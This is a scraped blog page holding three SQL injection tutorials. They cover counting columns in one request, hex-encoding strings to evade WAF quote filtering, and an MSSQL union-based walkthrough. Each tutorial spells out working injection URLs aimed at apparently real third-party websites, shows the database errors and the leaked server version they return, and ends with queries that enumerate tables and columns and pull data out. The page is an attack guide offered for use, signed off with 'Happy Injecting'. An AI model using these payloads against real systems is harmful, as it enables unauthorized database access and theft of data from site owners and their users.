<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7-wphxtwHUFtXs8kZK9jZC9gFHU5yP4IDzZUzupjeh_YGjuh1E0QUdds1i0iYqRB6pa6XgrJDXBsh4fdKlKsTpiOxv6pz1teH2qkgJfkLkDU7LUtY0s6g7G4lkZtIOfCCipQmz5ZaG-qt/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request+www.raijee1337.blogspot.com+tut.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7-wphxtwHUFtXs8kZK9jZC9gFHU5yP4IDzZUzupjeh_YGjuh1E0QUdds1i0iYqRB6pa6XgrJDXBsh4fdKlKsTpiOxv6pz1teH2qkgJfkLkDU7LUtY0s6g7G4lkZtIOfCCipQmz5ZaG-qt/s400/Alternative+Ways+For+Counting+Columns+At+One+Request+www.raijee1337.blogspot.com+tut.png" title="Alternative Ways For Counting Columns At One Request" width="400" /></a></div>
In this Tutorial I'm Going To Discuss On How many There are Ways for Counting All Columns At one Request.Simply we use ORDER BY Command For Counting Columns One By One and It take Time But All The Time we are looking for Easy Ways.So This Guide Will Help You In That Case.<br />
I will Tell You Guys Some Best Ways Which Will Help you in Counting Columns.<br />
<a name='more'></a><br />
<br />
<h2>
<b>METHOD 1</b> </h2>
<h3>
Using GROUP BY</h3>
This Method Is Known To Some people But I'm going To Cover it also For Newbies.<br />
This Method Is Very Simple. We Have To Build Our GROUP BY Command For Counting Columns At One Request.We will Give a large Numbered Values with GROUP BY and When we Execute Our Command it will Return Total Columns.<br />
<br />
<b>For Example</b>,<br />
<b>http://www.pistoiablues.com/news.php?id=111' group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- +</b><br />
And this Command Will Return Total Number Of Columns.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisQ4YsrDvMVoUJttht7C-35q2HkHqLvRFGx_l6Bjc2VBp-OjhocFTfyheC5AJiITwa5rYyQfvq5tWp5GWmM4CgEmnFlKVpFupdKX0sAL6N_Q2ukC9GcotTZzqRQT9V0QE0FgwRTXDMV-j2/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisQ4YsrDvMVoUJttht7C-35q2HkHqLvRFGx_l6Bjc2VBp-OjhocFTfyheC5AJiITwa5rYyQfvq5tWp5GWmM4CgEmnFlKVpFupdKX0sAL6N_Q2ukC9GcotTZzqRQT9V0QE0FgwRTXDMV-j2/s640/Alternative+Ways+For+Counting+Columns+At+One+Request1.png" title="Alternative Ways For Counting Columns At One Request" width="640" /></a></div>
<br />
<b>Unknown column '9' in 'group statement'</b><br />
so there are <b>8 Total Number</b> of <b>Columns.</b><br />
<br />
<h2>
<b>METHOD 2</b></h2>
<h3>
<b>Using COUNT Function</b></h3>
In this Method we will use <b>COUNT Function</b> for Counting The Total Number Of Columns.We will Use <b>Count Function </b>with <a href="http://raijee1337.blogspot.com/search/label/XPATH%20Injection%20Using%20Extractvalue" target="_blank">XPATH </a>or <a href="http://raijee1337.blogspot.com/search/label/Error%20Based%20Injection%20-Tutorial" target="_blank">Error Based Injection</a>.And We Have to Also Guess One Table Name for Counting All Valid Columns from the Database.<br />
I Will Use <a href="http://raijee1337.blogspot.com/search/label/XPATH%20Injection%20Using%20Extractvalue" target="_blank">XPATH Injection With Extractvalue</a>.<br />
<b>For Example,</b><br />
<br />
<b>http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='<span style="color: red;">TABLE_NAME_HERE</span>' and table_schema=database())))--+</b><br />
<br />
Replace <b><span style="color: red;">TABLE_NAME_HERE</span></b> with any one Table Name From the Database and Execute this Command .It will Return Total Number of Columns from The Database.<br />
<br />
<b>http://www.pistoiablues.com/news.php?id=111' and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='<span style="color: red;">news</span>' and table_schema=database())))--+</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTjtriqDbESpe3Zk52tXJdHIqxRYIv6Pvf3Rh6ReQ2u4vcGHVlSZTQdbQxc-KK_oX7PTIeWvEV-8olMv8cbtHm2F_m4o8UFdgRq3UoCwV1Og83XTbJwsTN-nm1uPACDQoe-9_xRQWkwKhO/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTjtriqDbESpe3Zk52tXJdHIqxRYIv6Pvf3Rh6ReQ2u4vcGHVlSZTQdbQxc-KK_oX7PTIeWvEV-8olMv8cbtHm2F_m4o8UFdgRq3UoCwV1Og83XTbJwsTN-nm1uPACDQoe-9_xRQWkwKhO/s640/Alternative+Ways+For+Counting+Columns+At+One+Request2.png" title="Alternative Ways For Counting Columns At One Request" width="640" /></a></div>
<br />
<b>XPATH syntax error:':8'</b><br />
so it Means There are <b>8 Total Number</b> of <b>Columns</b>.<b> </b><br />
<br />
<!-- adsense -->
<h2>
<b>METHOD 3</b></h2>
<h3>
<b>USING PROCEDURE ANALYSE Function</b></h3>
Just Few People Knows This Method .We Will Use <span style="font-weight: normal;">PROCEDURE ANALYSE Function In this Method For Counting Total Number of Columns.This Function Works really Amazing.We will just Execute this Command And see the Response from the Target Site.</span><br />
<br />
<b><span style="font-weight: normal;"><b>http://www.pistoiablues.com/news.php?id=111'</b> <b>Procedure Analyse()--+</b></span></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK9YDUj44KjbW08FwU08ekaYnUtVIb_02zEwZPyan-xD7KEKv6l8QfJKk7v3N_ynFcl5RkIyTZShrfUCpt5hPTCYweO8P6o3htz2hejoIKvQFgt7hrjCoP5rNxs8VSRjr4-anzDAlV8lbk/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK9YDUj44KjbW08FwU08ekaYnUtVIb_02zEwZPyan-xD7KEKv6l8QfJKk7v3N_ynFcl5RkIyTZShrfUCpt5hPTCYweO8P6o3htz2hejoIKvQFgt7hrjCoP5rNxs8VSRjr4-anzDAlV8lbk/s400/Alternative+Ways+For+Counting+Columns+At+One+Request3.png" title="Alternative Ways For Counting Columns At One Request" width="400" /></a></div>
<span style="font-weight: normal;">Here we Didn't Get Any kind of Error.But if we Notice the Web Page we Can See there are 8 Slashes .So it means <b>Total Number </b>of <b>Columns </b>Are <b>8.</b></span><br />
<br />
<h2>
<span style="font-weight: normal;"><b>METHOD 4 </b></span></h2>
<h3>
<span style="font-weight: normal;"><b>Using URL Tables </b></span></h3>
<span style="font-weight: normal;">In This Method we will Count Total Number of Columns through The Tables which were in our Target URL. For Example.</span><br />
<b><span style="font-weight: normal;"><b><span style="color: red;">Product</span>.php?id=</b></span></b><br />
<b><span style="font-weight: normal;"><b><span style="color: red;">Page</span>.php?id=</b></span></b><br />
<span style="font-weight: normal;"><b><span style="color: red;">News</span>.php?id=</b></span><br />
<span style="font-weight: normal;">This Command works behind The <b>SQL Query </b>which is in the <b>PHP CODING </b>that<b> Script.</b></span><br />
<span style="font-weight: normal;">For Example , We Gave Command For Counting The Columns.</span><br />
<br />
<span style="font-weight: normal;"><b>News.php?id=2 order by 3</b></span><br />
<br />
<span style="font-weight: normal;">So the <b>Query </b>which works<b> </b>behind is</span><br />
<span style="font-weight: normal;"><b> </b></span><br />
<span style="font-weight: normal;"><b><span style="color: red;">SELECT * FROM NEWS WHERE ID=2</span></b></span><br />
<span style="font-weight: normal;"><b> </b></span><span style="font-weight: normal;"> </span><br />
<span style="font-weight: normal;">We will Use those Tables for Preparing Our Columns Count Command.</span><br />
<br />
<span style="font-weight: normal;"><b>http://www.pistoiablues.com/<span style="color: red;">news</span>.php?id=111' and (select * from <span style="color: red;">news</span>)=(select 0)--+</b></span><br />
<span style="font-weight: normal;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihjJ0gI_DA7UPCxpYnwyhpI4rCKa81gVGbkZgV_fCNX9OMPcMgWgA7oVJ4PUsZSuMmF8n83eK5p1LEi0Fs27JVxAK8m-_pzKhUCVGSxfXko9Puhs4R_vftuPMTzwLbaHDAp7iuT1ltsgIy/s1600/Alternative+Ways+For+Counting+Columns+At+One+Request4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Counting Columns At One Request" border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihjJ0gI_DA7UPCxpYnwyhpI4rCKa81gVGbkZgV_fCNX9OMPcMgWgA7oVJ4PUsZSuMmF8n83eK5p1LEi0Fs27JVxAK8m-_pzKhUCVGSxfXko9Puhs4R_vftuPMTzwLbaHDAp7iuT1ltsgIy/s400/Alternative+Ways+For+Counting+Columns+At+One+Request4.png" title="Alternative Ways For Counting Columns At One Request" width="400" /></a></div>
And we got <b>Total Number</b> of <b>Columns </b>are <b>8</b>.<br />
<b>Operand should contain 8 column(s)</b><br />
These are Easy and simple ways For Counting Total Number of Columns At one Request and Will Help you guys while injecting.<br />
<br />
<b> </b><br />
<b><span style="color: #fce5cd;"><span style="color: #ea9999;">HAP</span><span style="color: #d0e0e3;">PY</span></span> <span style="color: #660000;">INJEC</span><span style="color: #d9d2e9;">TING<span style="color: #674ea7;"> </span></span><span style="color: #674ea7;">!!</span></b><br />
<br />
<b>AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee</b>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-56321425382714240742015-08-03T08:20:00.000-07:002015-08-17T09:08:11.905-07:00Converting Syntax in Hex Value - SQLi Tips<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4jMtRFZgaOr2SUQbRo5KKipzpGYVAzCrSeXmAVKk5exVGj99N4TKPcS1p5fch4PpzwfBwb40P-rEUq62mF9FC22f3tCUhOWIDK3G_U5XOToAPJAMEti2GpAL0QpkmOufs2Oiey21SNK-B/s1600/Converting+Syntax+in+Hex+Value+-+SQLi+Tips.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Syntax in Hex Value" border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4jMtRFZgaOr2SUQbRo5KKipzpGYVAzCrSeXmAVKk5exVGj99N4TKPcS1p5fch4PpzwfBwb40P-rEUq62mF9FC22f3tCUhOWIDK3G_U5XOToAPJAMEti2GpAL0QpkmOufs2Oiey21SNK-B/s320/Converting+Syntax+in+Hex+Value+-+SQLi+Tips.png" title="Converting Syntax in Hex Value - SQLi Tips" width="320" /></a><br />
After A long Time i'm Back With Another Tutorial on SQL Injection.In this Tutorial we will Discuss about <b>Converting Syntax in Hex Value</b>.Many Of Noobs Like me Dont know The usage of <b>Hex Value</b>.<br />
Some Times In Our Regular Manually Injecting we came To such Sites where we cant Get Data from Our SQLi Command.<br />
<a name='more'></a><br />
For Example we gave Command for Printing Our Name on the Web Page.<br />
so we Will Normally Add Name in the Vulnerable Column Enclosed By Single Quotes ' Before and After the Name.<br />
<br />
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(<span style="color: red;">'RAi Jee'</span>),3,4-- -</b><br />
<br />
When we Execute This Command Sometimes This Doesn't Work .Actually this Shit Happen because of Some Sites WAF's have Blocked The Usage of <span style="color: red;">Single Magic Quotes</span> .<br />
So in Such cases we have to deal with it by Converting Our Syntax in HEX value.<br />
we can Convert Our Syntax in Hex with HACKBAR .But Here is a online Website which also Convert our Syntax in HEX Value.<br />
<b>Link:www.asciitohex.com</b><br />
<br />
<b>Our Syntax:<span style="color: red;">RAi Jee</span></b><br />
<b><span style="color: red;"><span style="color: black;">Hex Value:<span style="color: red;">524169204a6565</span></span></span></b><br />
<span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">we have to Use <b><span style="color: red;">0x</span></b></span></span></span></span><b> </b>Before our HEX Value to make it Executable.<br />
<!-- adsense -->
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(</b><b><b><span style="color: red;"><span style="color: black;"><span style="color: red;">0x524169204a6565</span></span></span></b>),3,4-- -</b><br />
<br />
We can do the Same in for other Purpose where Single Quotes Doesn't Work .<br />
<br />
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name</b><b>),3,4 from information_schema.columns where table_name=<span style="color: red;">'ADMIN'</span>-- -</b><br />
If it Doesn't <b> </b>work<b> </b>Then we will Encode our Syntax in Hex Value.<br />
<br />
<span style="color: red;"><b>0x</b> 41444d494e </span><b><span style="color: red;">(HEX_VALUE_OF_ADMIN)</span></b><br />
<br />
<b>https://www.Target-Site.com/product.php?id=11 and false union select 1,2,group_concat(column_name</b><b>),3,4 from information_schema.columns where table_name=<span style="color: red;"></span></b><b><span style="color: red;"><span style="color: red;">0x41444d494e</span></span>-- -</b><br />
<br />
<b> </b>We can Also Encode Our HTML TAGS to HEX Value whenever SINGLE Quote Doesn't Exist.<br />
<br />
<b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com0tag:blogger.com,1999:blog-5545325473666478334.post-77595476257246500532015-07-22T07:12:00.001-07:002015-08-17T09:03:36.766-07:00MSSQL Union Based Injection Part-2 - Advanced Method<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMUKqQJtkCSuHwTtJGqjh85RKbJBRuCXJ7rqD92QHr7nB5rTkVRSe5vdiSq6Xwj3qRuK1UQMBjLc8lCZBqy9jBU7f7Z9wzyBEnoo4TmmdGMFdOTx99y8y2mYhJG54uIXCyVPQstXKT204u/s320/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+www.raijee1337.blogspot.com+1.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="320" />
</div>
<span style="font-size: small;">In Our Previous Tutorials About MSSQL injection we Have Cover the Basic Things.</span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/mssql-union-based-injection-step-by.html" target="_blank">MSSQL UNION BASED INJECTION</a></span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/mssql-injection-using-convert.html" target="_blank">MSSQL INJECTION USING CONVERT </a></span><br />
<span style="font-size: small;"><a href="http://www.raijee1337.blogspot.com/2015/07/ms-access-injection-tutorial.html" target="_blank">MS-ACCESS INJECTION</a></span><br />
<span style="font-size: small;">In This Tutorial You Will Learn Some Advanced Method that will help you in Injecting.</span><br />
<a name='more'></a><br />
<span style="font-size: small;">In Normal Sites we Do order by And Count Columns then Prepare UNION BASED command for Finding Vulnerable Columns but in some Cases We are stuck on UNION BASED .</span><br />
<span style="font-size: small;">So For This Tutorial i have Find site for Practice.</span><br />
<span style="font-size: small;">First we Will Check The Vulnerability, So we will Usually Add single Quote ' at the End Of the Parameter.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives'</b></span><br />
<span style="font-size: small;">After Executing The URL it Gives us Error !</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuDOal8TtDvWpZqi4xhcEGohJD_UbdY7Xq_MB7NEFpoiNI0E_gciPsWp6KOAI-qRv36w7Z7D0ZY0gUFME1_ncWlQ6FCTXst5wmMm6Xa7Ld6VMIJD7UEaoXVr8ne1OrQD1lCMEitCWUKlPv/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuDOal8TtDvWpZqi4xhcEGohJD_UbdY7Xq_MB7NEFpoiNI0E_gciPsWp6KOAI-qRv36w7Z7D0ZY0gUFME1_ncWlQ6FCTXst5wmMm6Xa7Ld6VMIJD7UEaoXVr8ne1OrQD1lCMEitCWUKlPv/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+1.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">As our Target is Vulnerable so Let's our injecting Manually .</span><br />
<span style="font-size: small;">First Let's check how many Columns are there. So We will use ORDER BY Command For Counting The Columns.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1--+</b></span><br />
<span style="font-size: small;"><b>No ERROR !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 100---+</b></span><br />
<span style="font-size: small;"><b>Again No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives order by 1000---+</b></span><br />
<span style="font-size: small;"><b>Still No Error !!</b></span><br />
<span style="font-size: small;"><b><br /></b>
Let's try String Based Injection.so<b> </b>we will Add Single Quote After the parameter.but If You have Notice the <b>ERROR RESPONSE </b>it automatically Adding Closed bracket " <b>) </b>" in our injection . So We will Add String with Closed Bracket " <b>) </b>" after the Parameter.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 1---+</b></span><br />
<span style="font-size: small;"><b>No Error !! Site Loaded Normally .</b></span><br />
<br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 6---+</b></span><br />
<span style="font-size: small;"><b>Again No Error !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') order by 7---+</b><b>Here we have got a ERROR !!</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizQfQ_XSRBEjDadtIqibGoqEVAWu5m60pnen3sYCJYJR39zbjuG-4W_RvpN3IOwhFsbMv-wzR7VODBkXymOGD6qt7-webmNuyxxudu8IzQfvMUXNbENJJ8NQTZcxWfKrQQrpHoLIbkWonZ/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizQfQ_XSRBEjDadtIqibGoqEVAWu5m60pnen3sYCJYJR39zbjuG-4W_RvpN3IOwhFsbMv-wzR7VODBkXymOGD6qt7-webmNuyxxudu8IzQfvMUXNbENJJ8NQTZcxWfKrQQrpHoLIbkWonZ/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+2.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-family: Arial; font-size: small;">Microsoft OLE DB Provider for ODBC Drivers</span><span style="font-size: small;"> <span style="font-family: Arial;">error '80040e14'</span></span>
<br />
<span style="font-family: Arial; font-size: small;">[Microsoft][ODBC SQL Server Driver][SQL
Server]<span style="color: red;">The ORDER BY position number 7 is out of range of the number of
items in the select list.</span></span>
<br />
<span style="font-family: Arial; font-size: small;">/products.asp</span><span style="font-family: Arial; font-size: small;">, line 131</span> <br />
<span style="font-size: small;"><b><br /></b>So There are 6 Total Number of Columns. Now Let's Prepare Our UNION BASED Command For Finding The Vulnerable Columns .</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') union select 1,2,3,4,5,6---+</b></span><br />
<span style="font-size: small;">But Here we Got Error !</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZfNMWjjLOlg7lLTXXJNfIjNqw0hqGAOWrbZ6vaXh1KDlIotU5r-CTHxga1RHUEGouq6nnhCZ0dFKK4mgW-m3gh_QViehu-tB_G4GbtJLjV5LUd2jzp0aRqBLdrJNe4dJB7nToul9VkUv/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZfNMWjjLOlg7lLTXXJNfIjNqw0hqGAOWrbZ6vaXh1KDlIotU5r-CTHxga1RHUEGouq6nnhCZ0dFKK4mgW-m3gh_QViehu-tB_G4GbtJLjV5LUd2jzp0aRqBLdrJNe4dJB7nToul9VkUv/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+8.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<br />
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server<span style="color: red;">]Conversion failed when converting the varchar value 'PenDrives' to data type int.</span></span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/products.asp</span><span style="font-family: Arial;">, line 131</span></b></span> <br />
<span style="font-size: small;">Although Our Column Count is Correct .The Problem is With The Numbered Values .So to Bypass this Error Let's add Null Values instead of Numbers and Then Execute our UNION BASED Query.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrives') and 1=2 union select null,null,null,null,null,null---+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Bingooo :p ERROR BYPASSED !! </b></span><br />
<span style="font-size: small;">but we cannot see the Vulnerable columns. So We will check every Column One by One .First let's check the Version.we will Add @@version in the 1st Column then again replace it to null and go to the next one.</span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select @@version,null,null,null,null,null--+</b></span><br />
<span style="font-size: small;">Here we got the Version.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RLMCr5CD4RdNZb4rdkfR4lc2RtvZXzB_d6SWEsZtWp31NV4fyY5qvJ3uHzun3FALMbbYf0YL-6D83HljqA7EZ-isjjVYfmFboW2WGuf3rxn9gaoe0qfcKs5Kd0-hKbqr5hosQff6qXEc/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RLMCr5CD4RdNZb4rdkfR4lc2RtvZXzB_d6SWEsZtWp31NV4fyY5qvJ3uHzun3FALMbbYf0YL-6D83HljqA7EZ-isjjVYfmFboW2WGuf3rxn9gaoe0qfcKs5Kd0-hKbqr5hosQff6qXEc/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+5.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Version:</b><b><span style="font-family: Arial;"><span style="color: red;">Microsoft
SQL Server 2012 (SP1) - 11.0.3000.0 (X64)
Oct 19 2012 13:38:57
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )</span></span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL
Server]Conversion failed when converting the nvarchar value '<span style="color: red;">Microsoft
SQL Server 2012 (SP1) - 11.0.3000.0 (X64)
Oct 19 2012 13:38:57
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )</span>
' to data type smallint.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/products.asp</span><span style="font-family: Arial;">, line 131</span></b></span><br />
<span style="font-family: Arial; font-size: small;">Now Let's Check the Tables from the current Database.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="font-family: Arial;">http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables--+</span></b></span><br />
<span style="font-family: Arial; font-size: small;">Here we got table name</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzqeSWwAgZkR8pVxL067mRS7uI4Thwtfeb7_PQ7563hNaPDjnBJEwom06Wptws18rDChk8btZI2JdIHt_WKAikymnR8IzVg8ntFVIsFuDWLd0UgsbprakNlQc1bbEQwzpI1KOPerXW2yP/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzqeSWwAgZkR8pVxL067mRS7uI4Thwtfeb7_PQ7563hNaPDjnBJEwom06Wptws18rDChk8btZI2JdIHt_WKAikymnR8IzVg8ntFVIsFuDWLd0UgsbprakNlQc1bbEQwzpI1KOPerXW2yP/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+6.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;">As this is The First Table name Let's Check The Next one.For Finding the other tables we will add this Part in our Query.</span><br />
<span style="color: red; font-size: small;">where table_name not in ('<span style="color: #4c1130;">PREVIOUS_TABLE_1</span>','<span style="color: #4c1130;">PREVIOUS_TABLE_2</span>')</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables where table_name not in ('products')--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After getting the Tables next we will check the Columns.so we will use this Query for Getting the Columns from the Table.</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union
select column_name,null,null,null,null,null from
information_Schema.columns where table_name='<span style="color: red;">OUR_TABLE_NAME_HERE</span>'--+</b></span><br />
<span style="font-size: small;">As we have got the First Column . So Checking The Other Columns we will add this Part in Our Query.</span><br />
<br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union
select column_name,null,null,null,null,null from
information_Schema.columns where table_name='<span style="color: red;">OUR_TABLE_NAME_HERE</span>' where column_name not in ('<span style="color: red;">PREVIOUS_COLUMN_1</span>','<span style="color: red;">PREVIOUS_COLUMN_2</span>')--+</b></span><br />
<span style="font-size: small;"><b><br /></b>So After Getting The Table and the Columns Final Part is To Extracting Data from the Columns.</span><br />
<span style="font-size: small;">So This is The Final Query .</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union
select <span style="color: red;">OUR_COLUMN_HERE</span>,null,null,null,null,null from <span style="color: red;">OUR_TABLE_HERE</span>--+</b></span><br />
<span style="font-size: small;"><b><br /><span style="color: #cc0000;">Hap</span><span style="color: #a2c4c9;">py</span> <span style="color: #45818e;">Inj</span><span style="color: #741b47;">ect</span><span style="color: #8e7cc3;">ing</span><span style="color: #0c343d;"> !!</span></b></span><br />
